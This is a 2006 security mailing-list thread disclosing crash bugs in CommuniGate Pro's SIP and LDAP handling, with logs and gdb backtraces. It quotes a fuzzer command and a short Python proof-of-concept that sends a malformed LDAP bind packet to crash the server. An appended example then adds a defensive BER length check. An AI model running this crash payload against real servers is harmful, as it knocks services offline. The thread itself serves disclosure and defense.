Dailydave mailing list archives
Re: Proof of concept for CommuniGate Pro Server vulnerability
From: "Evgeny Legerov" <research () gleg 7 com1 ru>
Date: Wed, 01 Feb 2006 02:54:19 +0300
Hi all,
"KF (lists)" <kf_lists () digitalmunition com> wrote:

> An SIP issue that was not reported or disclosed was also fixed in the same update. The issue is detailed below. You can easily trigger this issue with the Protos SIP toolset.
>
> StarGate:~# java -jar c07-sip-r2.jar -touri kfinisterre@192.168.0.35 -single 2361
>
> Log file snippet:
>
> Dec 9 16:18:14 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 started
> Dec 9 16:20:35 localhost CommuniGatePro: Exception signal: 11, trying to recover
> Dec 9 16:20:35 localhost CommuniGatePro: Exception in <STThread 87394E8 UDPReceiver 5060>
> Dec 9 16:21:07 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 started
> Dec 9 16:21:33 localhost CommuniGatePro: Exception signal: 11, trying to recover
> Dec 9 16:21:33 localhost CommuniGatePro: Exception in <STThread 8738B60 UDPReceiver 5060>
>
> 0x4010e3ac in memmove () from /lib/libc.so.6
> (gdb) i r
> eax            0xffffffe0       -32
> ecx            0x1              1
> edx            0xffffffe1       -31
> ebx            0x8699758        141137752
> esp            0xbabff670       0xbabff670
> ebp            0xbabff678       0xbabff678
> esi            0x868eeae        141094574
> edi            0xffffffe0       -32
> eip            0x4010e3ac       0x4010e3ac
> (gdb) x/i $pc
> 0x4010e3ac <memmove+92>: repz movsb %ds:(%esi),%es:(%edi)
> (gdb) bt
> #0  0x4010e3ac in memmove () from /lib/libc.so.6
> #1  0x0836cdac in SBMutableData::setBytes ()
> #2  0x08280964 in VSIPPacket::parseFields ()
> #3  0x0827f8da in VSIPPacket::parseData ()
> #4  0x0827c8e8 in VSIP::processReadPacket ()
> #5  0x0827ce83 in VSIP::processUDPRequest ()
> #6  0x081bfeb1 in VUDPListener::receiver ()
> #7  0x081bfa71 in VUDPListener::receiverStarter ()
> #8  0x0838ad1d in STThreadStarter ()
> #9  0x4002af4c in pthread_start_thread () from /lib/libpthread.so.0
> #10 0x4002afda in pthread_start_thread_event () from /lib/libpthread.so.0
> #11 0x4015f92a in clone () from /lib/libc.so.6
Looks interesting, thanks for the info.

Upcoming 5.0.8 version of CommuniGate should have fixes for at least two different LDAP bugs (found with ProtoVer LDAP 1.4).
> -KF
>
> Evgeny Legerov wrote:
>> Hi,
>>
>> The simple code below can be used to reproduce one of CommuniGate 5.0.6 LDAP vulnerabilities (http://www.gleg.net/cg_advisory.txt)
>>
>> #!/usr/bin/env python
>> # Use this code at your own risk.
>> # It may crash your server!
>> # Author: Evgeny Legerov
>> import sys
>> import socket
>>
>> HELP="""
>> CommuniGate Pro 5.0.6 vulnerability.
>> Found with ProtoVer LDAP testsuite v1.1
>>
>> Program received signal SIGSEGV, Segmentation fault.
>> [Switching to Thread -1389495376 (LWP 20235)]
>> 0xada99bbc in memcpy () from /lib/libc.so.6
>> (gdb) backtrace
>> #0  0xada99bbc in memcpy () from /lib/libc.so.6
>> #1  0x083924b8 in STCopyCString ()
>> #2  0x08349d5b in BERPackedData::makeCString ()
>> #3  0x081ae71a in VLDAPInput::processBINDrequest ()
>> #4  0x081af747 in VLDAPInput::processInput ()
>> #5  0x082c9373 in VStream::worker ()
>> #6  0x082ca1e9 in VStream::starter ()
>> #7  0x08399e7d in STThreadStarter ()
>> #8  0xadb8bb80 in start_thread () from /lib/libpthread.so.0
>> #9  0xadaf8dee in clone () from /lib/libc.so.6
>> (gdb) x/i $eip
>> 0xada99bbc <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)
>> (gdb) info regi esi edi ecx
>> esi            0x8688961        141068641
>> edi            0x86c6fff        141324287
>> ecx            0x3fff7eae       1073708718
>> """
>>
>> print HELP
>>
>> host="localhost"
>> port=389
>>
>> sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>> sock.connect((host,port))
>>
>> s = "\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"
>> s += "\x84\xff\xff\xff\xff"
>>
>> sock.sendall(s)
>> sock.close()
Regards, Evgeny Legerov
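An added example, not code from this thread or from CommuniGate: a Python 3 BER length check taken from the server's side of the quoted LDAP BindRequest. It walks the exact bytes from the PoC above and rejects the credentials element whose long-form length (0x84 ff ff ff ff, i.e. 0xffffffff) exceeds what the packet actually carries, which is the check a parser must perform before handing the value to any copy routine; the well-formed comparison packet is constructed for the example.

```python
# Added example, not the post's code: a BER length check done before any copy.
# POC_BIND is the packet quoted in the post; GOOD_BIND is a constructed
# well-formed counterpart whose credentials element carries the 2 bytes it says.
POC_BIND = (b"\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"
            b"\x84\xff\xff\xff\xff")
GOOD_BIND = (b"\x30\x10\x02\x01\x01\x60\x0b\x02\x01\x03\x04\x02\x44\x4e\x80"
             b"\x02\x70\x77")


def read_tlv(buf, pos):
    """Decode one BER tag+length at buf[pos]; return (tag, length, value_offset).
    Raises ValueError when the declared length exceeds the bytes present."""
    if pos + 2 > len(buf):
        raise ValueError("truncated header at offset %d" % pos)
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80 == 0:                 # short form: length is 0..127
        length = first
    else:                                 # long form: 0x80|n, then n bytes
        n = first & 0x7f
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("bad long-form length for tag 0x%02x" % tag)
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    avail = len(buf) - pos
    if length > avail:                    # the check the crashing path lacked
        raise ValueError("tag 0x%02x declares %d bytes but only %d remain"
                         % (tag, length, avail))
    return tag, length, pos


def check_bind_request(packet):
    """Walk LDAPMessage -> BindRequest -> credentials; "ok" or a reject reason."""
    try:
        tag, _, p = read_tlv(packet, 0)           # LDAPMessage SEQUENCE
        if tag != 0x30:
            return "reject: not a SEQUENCE"
        _, ln, p = read_tlv(packet, p)            # messageID INTEGER
        tag, _, p = read_tlv(packet, p + ln)      # BindRequest [APPLICATION 0]
        if tag != 0x60:
            return "reject: not a BindRequest"
        _, ln, p = read_tlv(packet, p)            # version INTEGER
        _, ln, p = read_tlv(packet, p + ln)       # name LDAPDN
        read_tlv(packet, p + ln)                  # authentication [0] simple
        return "ok"
    except ValueError as err:
        return "reject: %s" % err
```

On the PoC bytes the walk stops at the [0] credentials element, which declares 4294967295 bytes with none left in the packet; the same element in the constructed packet passes.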